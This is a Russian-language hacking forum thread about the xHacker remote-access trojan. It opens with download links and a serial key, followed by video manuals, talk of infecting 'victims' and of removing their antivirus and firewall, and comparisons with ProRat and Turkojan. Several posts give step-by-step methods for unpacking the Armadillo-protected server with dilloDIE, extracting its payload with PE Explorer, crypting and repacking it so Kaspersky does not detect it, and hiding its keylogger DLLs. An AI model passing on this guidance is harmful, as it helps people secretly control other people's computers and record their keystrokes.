http://img267.imageshack.us/img267/7237/hackzr1.jpg

http://img516.imageshack.us/img516/5203/scan1mu9.jpg

User Name: Tom
Serial Number: 5233-19EB-A71C-C481
Password: ForTomAllen

Download тут. (http://rapidshare.com/files/55646879/xHacker.3.ForTomAllen.rar)

Не понял как его настраивать... У кого есть мануал, поделитесь...

Перезалейте пожалуйста куда - нибудь в другое место

Перезалейте пожалуйста куда - нибудь в другое место
http://slil.ru/24948122
юзай ссыль =)

Перезалейте пожалуйста куда - нибудь в другое место
http://depositfiles.com/files/1989096

Замутил видео мануал по настройке этой программки =)

http://slil.ru/24958657

htp://xhacker.download-area51.com

А можно узнать, откуда была скачана программа и где ее можно купить?

Люди, подскажите из-за чего может быть такой глюк.
Есть два человека, оба запустили у себя сервер xhacker'a. Один в Москве, другой в Харькове. Могу подключиться к обоим, останавливать процессы, рыться в реестре, но у того, кто в Москве я могу спокойно скачивать файлы, а у того, кто в Харькове нет. Серверы у обоих одинаковые установлены. У того, кто в Харькове, нет ни фаервола, ни антивира (я снес их через тот же xhacker, был обычный виндосовский брендауэр и dr.web). Почему у одного файлы качаются, у другого нет? (хотя я их вижу через файл-менеджер, вижу их размер, аттрибуты)

У Москвича, при запуске сработал антивирь, и удалил файл который отвечает за скачивание файлов. Такой же случай был и у меня... Аналогично происходит и с prorat.

Спасиб за объяснение.
Т.е. вопрос можно решить, впарив второй раз тот же сервер xhacker'a, предварительно остановив все брендмауэры и антивиры? или уже неполучится?
P.S. - у prorat есть оф сайт?

_prorat.net

Скачал троян, скачал видео-мануал...
Возник ток один ворос.. хост с которого будут приходить репорты... это Ip жертвы?

Заранее спасибо...

Перезалейте видео куданить в другое место плз

http://dump.ru/files/n/n402605520/ Держи

Криптуеться? Если да то чем? =)

Криптуеться? Если да то чем? =)
Криптуется, но при запуске может не запуститься, а если запустится то спалятся файлы которые копируются в системную директорию.

Отдуши, софтина супер!!! Респект

почему люди жалуются на ссыль в первом посте? или ее уже подправили?

Отдуши, софтина супер!!! Респект
Неужели криптануть удалось?

Нет, я не пробовал криптовать, просто протестил на одном типе. Мне понравилось то что не надо пробивать ip чтоб приконектится к серваку, ща буду криптовать всем что есть и смареть на работоспособность =) впереди ещё целая ночь!

Нет, я не пробовал криптовать, просто протестил на одном типе. Мне понравилось то что не надо пробивать ip чтоб приконектится к серваку, ща буду криптовать всем что есть и смареть на работоспособность =) впереди ещё целая ночь!
Постарайся криптануть! Если получится, буду очень признателен!

Испытал окола 15 криптеров, кароч шляпа это либо палится, либо не работает :(

AlexDee, тебе помогут только приватные крипторы, тобишь за денюшку, а так все остальные конечно же палятся.

AlexDee, тебе помогут только приватные крипторы, тобишь за денюшку, а так все остальные конечно же палятся.
Себе то я криптанул, но хотел помочь, людям, не у всех же есть приватный софт ;)

Тоже не понял насчет хоста с которого должны приходить репорты, обьясните что к чему

Парни выложите кто нибудь NO-IP DUC v.2.2.1

Себе то я криптанул, но хотел помочь, людям, не у всех же есть приватный софт ;)
А чем криптанул то?

А этот троян в авотозагрузку прописывается? А то у меня повторный сигнал не идет с троя. незнаю в чем трабла мож поможите

Данный коняжка в автозагрузку к сожалению лезет =(

Млин бред я у себя запустил коня после перезакрузки все норма в окне Sin мой комп есть.А вот я кинул другу по тестить так в окне Sin есть его комп а посли перезагрузки моего компа в окне Sin его компа нету есть тока мой.Так почему его комп больше не появляется?у него нет антивира и фаера.Почему так?

Любой софт не идеален.
Это может зависить от провайдера, от его машины...
У меня такое же случалось. Но зачем тебе надо видеть компьютер жертвы постоянно? Если ломать кого, то ломать сразу и быстро, а оставлять на потом думаю не актуально.

Не подстава??? а то заюзаю а там ещё чё... кстати ничем не упакован???

Upx - ом вроде упакован

Армадиллой он упакован однако!И самый простой способ что б его закриптовать,то нужно сначало снять арму,но не у того файла - дроппера,что выплевывает билдер,а у того ,что будет находиться
в той дирректории ,что была указана при настройках!Затем криптуем каким либо криптором ,например FreeCryptor от GLOFF ,к сожелению каспером палится и пакуем например аспаком.В результате и файлик становится меньше,непалится большенством антивирей и нормально работает,по крайней мере локально!Вот если только потом захотите зарядить его какому нить юзьверю,то придётся уже самому искать пути,как поместить его в нужную папку,а так же вероятно и для того что б он загружался впоследствии,но я не особо разбиралась!Сам же копироваться он уже не будет!А так же можно снять арму и с остальных файлов.
и тогда не надо будет вводить пароль каждый раз заного!

Вот проблемка у меня! На видео мануале, Zolden настраивает на виртуалке Backdoor, а трой то, этот работает через интернет, если да дайте мануал видео по настройке!

Вот проблемка у меня! На видео мануале, Zolden настраивает на виртуалке Backdoor, а трой то, этот работает через интернет, если да дайте мануал видео по настройке!
Я создаю трояна на обычном компе, и закидываю на виртуалку. И виртуалка и обычный ПК подключены к инету.

Я создаю трояна на обычном компе, и закидываю на виртуалку. И виртуалка и обычный ПК подключены к инету.

Я все понял, что ты делал на компе, заразил виртуалку, я сам приписывая localhost заражал себя, кидал его в Lan сеть, тестил трой, все работает путем, вот только две проблемы! Заражая комп жертвы, трой не коннектиться через интернет, может я не правильно настраиваю? :rolleyes: Вторая проблема с трояном, он не убивает с процессов Kaspersky 7.0, что тут говорить про убийство, :) трой даже не останавливает постоянную защиту, хотя эти функции присуствуют в нем. :(

А ЧЁРТ, Avp-шник палит!!

Я все понял, что ты делал на компе, заразил виртуалку, я сам приписывая localhost заражал себя, кидал его в Lan сеть, тестил трой, все работает путем, вот только две проблемы! Заражая комп жертвы, трой не коннектиться через интернет, может я не правильно настраиваю? :rolleyes: Вторая проблема с трояном, он не убивает с процессов Kaspersky 7.0, что тут говорить про убийство, :) трой даже не останавливает постоянную защиту, хотя эти функции присуствуют в нем. :(

Это говорит о том что ProRat Se 1.9 рулит , переюзал много разных версий троянов , имхо Крыс самый лучший ;)

Это говорит о том что ProRat Se 1.9 рулит , переюзал много разных версий троянов , имхо Крыс самый лучший ;)
Согласен, единственный RAT к которому есть патч блокирующий выброс DLL файлов... Но опять таки, нужен обход проактивной защиты (будь она не ладна), но не исключаем что не все же юзают каспера, и прочие мощные защиты

Bеlfigor-про рат рулит но всежи укаждой софтины есть сваи +и - .

Согласен, единственный RAT к которому есть патч блокирующий выброс DLL файлов... Но опять таки, нужен обход проактивной защиты (будь она не ладна), но не исключаем что не все же юзают каспера, и прочие мощные защиты

Так вот наглядный сегодняшний пример " криптонул сервак прората , через радмина переправил , через телнет запустил , смотрю , сервак выплюнул dll , сработал Каспер 7 , вижу юзер нажал удалить диллы , и каспер ему мол файлы вылечил (неизлечимые удалил), нужно рестануться , ... после рестарта ПРЕКРАСНО ПОДРУБИЛСЯ к челу :D , за слова отвечаю , и тут на форуме уже было сказано , что прорат превосходно работает и без dll , пусть паляться , главное , что сам трой в системе и работает на 5+ ;)

Как так он без dll пашет.

В Dll вроде ток кейлог и еще что-то))

Belfigor

что прорат превосходно работает и без dll , пусть паляться , главное , что сам трой в системе и работает на 5+

Для чего используется DLL?

Эта шпионская функция используется для того чтоб из
списка процессов трои прятать и не только в списке
процессов но и в Ctrl Alt Del так что dll'ка нужна серано
но всёж кому как.

В Dll вроде ток кейлог и еще что-то))

да верно , он выплёвывает winkey.dll Trojan.KeyLogger и reginv.dll

Belfigor



Для чего используется DLL?

Эта шпионская функция используется для того чтоб из
списка процессов трои прятать и не только в списке
процессов но и в Ctrl Alt Del так что dll'ка нужна серано
но всёж кому как.

2 Mo4x я сделал не большое видео , если у тебя безлим , то можешь качнуть , в процессах у меня он весит как system(как назавёшь файло так и весит ;) я просто не знаю как доказать правдивость выше написанного , видео весит 8м :( и так сжал 58м до 8 , так что уж не обессутьте .

зы , но трой рабочий на все 5+ , то есть все функции он выполняет ;) видео http://slil.ru/25273312

Скажите а кто нить до сих пор бесплатно криптует?

Скажите а кто нить до сих пор бесплатно криптует?

а самому что не судьба криптонуть ? :D

а самому что не судьба криптонуть ? :D
Каким образом он криптанет? Возможно что у него нету криптора

Каким образом он криптанет? Возможно что у него нету криптора

в разделе "Крипторы" и "Джойнеры" есть полностью бесплатные и рабочие крипторы от "Gloff" :)

в разделе "Крипторы" и "Джойнеры" есть полностью бесплатные и рабочие крипторы от "Gloff" :)
Да, только есть один нюанс, рабочие крипторы от Gloff, это все хорошо, но у них нету фичи, для установки обхода проактивной защиты того же касперского, так что если он захочет комунибудь насолить при помощи этого бэкдора, ему придется удостовериться о наличии антивируса на компьютере жерты

Крипторы рабочие но хакер выбивает ошибку запуска..

Вобщето ребятишки советую вам поюзать крипторы каторые прачут dll так как каспер длл палет авоть сам сервак можно и криптором от глофа спратоть и не каких ошибок вылетать не будет.

Вобщето ребятишки советую вам поюзать крипторы каторые прачут dll так как каспер длл палет авоть сам сервак можно и криптором от глофа спратоть и не каких ошибок вылетать не будет.
Линк в студию...Плизз

И может,прежде чем криптовать вы армадиллу с сервера снимите и тогда и ошибок не будет!

Криптор сам ищи тимболие денег тебе на него нехватет такое удавольствие стоет не слабо.

Криптор сам ищи тимболие денег тебе на него нехватет такое удавольствие стоет не слабо.
Хех! :) Откуда тебе любезный знать,хватит мне денег или нет!Ты ответь по существу,назови хотя бы такие крипторы!

Стучи в аську.

Есть ведь куча статей) Даже когда то видел описание криптовки связкой паблик крипторов. Гиморно конечно, но при определённом навыке работоспособность сохранялась.

у меня ни с собой ни с кем не работает, коннектится, а ни одной функции тупо не выполняет.. :/

Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.

Актуален ли он на сегодняшний день?
Или может есть обновления или что-то лутче?(прошу совет)

p.s.заранее благодарен.

Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.
Криптовать сначала файлы , которые он создает , а потом сам трой. Легко и просто.

Драсьте.
не могу понять одного во всех прорат-подобных троянах. ведь они выплёвывают всевозможные ехе-шники в разные системные папки, каторые есессно паляцо. даже если закриптовать билдер, они все равно буду палицо.
возникает вопрос: как можно закриптовать все сразу? то есть и сервер, и выплевываемые ехе-шники.
я нашёл способ :)
Итак что понадобиться:
PE Explorer,PeID(качаем с cracklab.ru) и dilloDIE ссылка (http://88.80.194.49/~cip/re/index.php?page=tools_list&cat=owncoded)
ну как создать сервер я надеюсь вы знаете))
Сервер упакован Armadillo и вручную его распаковать очень сложно,поэтому я воспользовался автоматическим распаковщиком dilloDIE 1.6
Запускаем dilloDie и выбираем файл server.exe(в моём случае) ждём пару минут…итак файл распаковался.
Открываем получёный файл в PE Explorer
http://img.pixs.ru/images/5BMP_4920635_46369.bmp (http://pixs.ru/?ref=46369)
Сохраняем файл 101(сохраняеться почемуто как GUSTOM_101) в какуюнибудь папку и также распаковываем dilloDIE.теперь бэкдор можно нормально криптовать и он некидает .exe файлы в сис.директории

Могу дать ссылки на видео , где криптуется трой Turkojan. Этот трой тоже выплевывает длл файлы , и я их криптанул удачно. Для этого вируса просто надо будет аналагично сделать.

Дайте нормальную ссилку на трой,ато ниодна не пашет